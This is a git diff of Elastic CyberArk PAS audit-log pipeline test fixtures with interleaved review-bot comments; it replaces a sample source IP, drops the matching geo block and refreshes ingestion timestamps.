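Review bot: The only change in this `@@ -250,7 +250,7 @@` hunk is the `event.ingested` value, which the test runner stamps at regeneration time and has no relation to the IP substitution the commit is about; the same timestamp-only rewrite recurs in the `@@ -314,7` hunk of this file and in the `@@ -95,7`, `@@ -101,7` and `@@ -93,7` hunks of the 411, 412 and 414 expected files. Unless `event.ingested` is already declared dynamic for these pipeline tests, every unrelated regeneration will keep rewriting the fixtures this way, which buries the meaningful changes (the address substitutions) in noise. Declaring it in the data stream's pipeline test config, e.g. `dynamic_fields: {"event.ingested": ".*"}`, would let the comparison ignore the field so these hunks disappear from future diffs. The enclosing JSON object continues outside the hunk.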
@@ -314,7 +314,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024624300Z", + "ingested": "2021-12-09T13:37:03.416602300Z", "original": "\u003c5\u003e1 2021-03-14T12:04:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:53\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:53Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:53\",\"IsoTimestamp\":\"2021-03-14T12:04:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 
90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log index 283cc15f94e..6cfba6b84db 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log 
@@ -1,2 +1,2 @@
-<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
+<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
 <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:03:43\n 2021-03-11T18:03:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 4\n User Authentication\n Error\n Administrator\n User Authentication\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n User Authentication\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User 
Authentication","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json
index 13c03f2cb83..950d83a79c9 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json
@@ -7,20 +7,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -40,7 +28,7 @@
 "Administrator"
 ],
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -48,7 +36,7 @@
 "severity": "Error",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T18:42:36Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "User Authentication",
 "message": "User Authentication",
 "issuer": "Administrator",
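Review bot: The `@@ -7,20 +7,8 @@` hunk removes the entire `source.geo` object rather than replacing it with the enrichment for the new address, so this fixture no longer asserts that the pipeline's geoip step fills `source.geo` for a public source IP; the old expectation (Barcelona) did cover that path. If 67.43.156.13 falls inside a range the test GeoIP database resolves, the expected output should carry that range's geo fields instead of nothing; if the address is deliberately chosen to be unresolvable, that intent is worth recording next to the fixture so a later regeneration does not reintroduce a geo block and make the test appear to regress. The `@@ -40,7` and `@@ -48,7` hunks on this line only propagate the same address and raise no separate issue.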
@@ -61,8 +49,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.129865Z", - "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:03.891416600Z", + "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", "code": "4", "kind": "event", "action": "authentication_failure", 
@@ -137,7 +125,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.129876300Z", + "ingested": "2021-12-09T13:37:03.891424700Z", "original": "\u003c7\u003e1 2021-03-11T18:03:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:03:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:03:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e4\u003c/MessageID\u003e\\n \u003cDesc\u003eUser Authentication\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUser Authentication\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUser Authentication\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:03:43\",\"IsoTimestamp\":\"2021-03-11T18:03:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User 
Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "4", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json index 846915fcf6f..2bf4a12105e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json 
@@ -95,7 +95,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.179654900Z", + "ingested": "2021-12-09T13:37:04.116666Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e411\u003c/MessageID\u003e\\n \u003cDesc\u003eWindow Title\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eWindow Title\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.5\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eWindow Title\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"411\",\"Desc\":\"Window Title\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Window Title\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.5\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\",\"IsoTimestamp\":\"2021-03-16T17:11:42Z\",\"Message\":\"Window 
Title\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "411", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json index 5c4538a35d8..51effe33ff9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json 
@@ -101,7 +101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.222280400Z", + "ingested": "2021-12-09T13:37:04.279820500Z", "original": "\u003c5\u003e1 2021-03-25T11:29:37Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 07:29:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T11:29:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e412\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eMSSQL\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MSSql-epmsvr01.cybr.com-sa\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MSSql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"sa\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"tgtsvr01.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"master\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580240\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011980\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SQL;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 07:29:37\",\"IsoTimestamp\":\"2021-03-25T11:29:37Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"412\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"MSSQL\",\"File\":\"Root\\\\Database-MSSql-epmsvr01.cybr.com-sa\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SHOW 
DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MSSql\"},{\"Name\":\"UserName\",\"Value\":\"sa\"},{\"Name\":\"Address\",\"Value\":\"tgtsvr01.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"master\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580240\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011980\"},{\"Name\":\"Tags\",\"Value\":\"SQL;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "412", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json index 5fd65175940..6c06eebed5b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json 
@@ -93,7 +93,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.266376100Z", + "ingested": "2021-12-09T13:37:04.451006400Z", "original": "\u003c5\u003e1 2021-03-25T10:04:06Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 06:04:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T10:04:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e414\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux SSH Keys\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eVerificationPeriod\u003c/Reason\u003e\\n 